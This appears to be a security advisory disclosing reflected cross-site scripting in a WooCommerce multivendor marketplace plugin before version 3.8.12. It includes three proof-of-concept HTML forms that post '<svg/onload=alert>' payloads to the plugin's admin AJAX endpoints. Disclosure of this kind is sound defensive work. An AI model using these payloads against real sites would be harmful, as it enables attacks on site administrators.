Multivendor Marketplace Solution for WooCommerce < 3.8.12 – Multiple Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape numerous parameters before outputting them back in admin pages via various AJAX actions, leading to Reflected Cross-Site Scripting

Proof of Concept

With SitePress active, and with more than 1 active language:

<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=wcmp_product_translations" method="POST">
<input type="hidden" name="proid" value='"><svg/onload=alert(/XSS/)>'>
<input type="submit" name="Submit">
</form>
</body>
</html>

6458 being a valid Product ID
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=product_report_sort" method="POST">
<input type="hidden" name='total_sales_data["><svg/onload=alert(/XSS/)>][product_id]' value="6458"/>
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>

16 being valid vendor id
<html>
<body>
<form action="http://wp.lab/wordpress/wp-admin/admin-ajax.php?action=vendor_report_sort" method="POST">
<input type="hidden" name='total_sales_data["><svg/onload=alert(/XSS/)>][vendor_id]' value="16"/>
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>